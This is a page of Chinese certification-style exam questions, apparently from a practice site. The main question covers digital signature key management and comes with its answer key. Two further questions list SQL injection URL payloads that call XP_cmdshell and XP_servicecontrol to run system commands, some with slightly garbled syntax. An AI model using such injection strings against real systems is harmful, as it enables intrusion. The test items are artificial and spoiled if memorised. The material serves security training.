公司在使用数据签名技术时,除充分保护私钥的机密性,防止窃取者伪造密钥持有人的签名外,还应注意
- A. 采取保护公钥完整性的安全措施,例如使用公约证书
- B. 确定签名算法的类型.属性以及所用密钥长度
- C. 用于数字签名的密钥应不同于用来加密内容的密钥
- D. 符合有关数字签名的法律法规,必要时,应在合同或协议中规定使用数字签名的相关事宜
查看答案
纠错
若遇到问题请联系 客服QQ:3480655671
正确答案: ABCD
本题解析: 暂无解析
你可能感兴趣的试题
以下哪条命令能利用“SQL”漏洞动用XP_cmdshell存储过程,启动或停止某项服务?()
- A. http://localhost/script?’:EXEC+master..XP_servicecontrol+’start’,+’Server’;-
- B. http://localhost/script?0’:EXEC+master..XP_servicecontrol+’start’,+’Server’;--
- C. http://localhost/script?1’:EXEC+master..XP_servicecontrol+’start’,+’Server’;--
- D. http://localhost/script?0’:EXEC+master..XP_servicecontrol+’start’,+’Server’--
以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程,获得某个子目的清单?()
- A. http://localhost/script?’:EXEC+master..XP_cmdshell+’dir’:--
- B. http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’:--
- C. http://localhost/script?0’:EXEC+master..XP_cmdshell+’dir’:--
- D. http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’--
置顶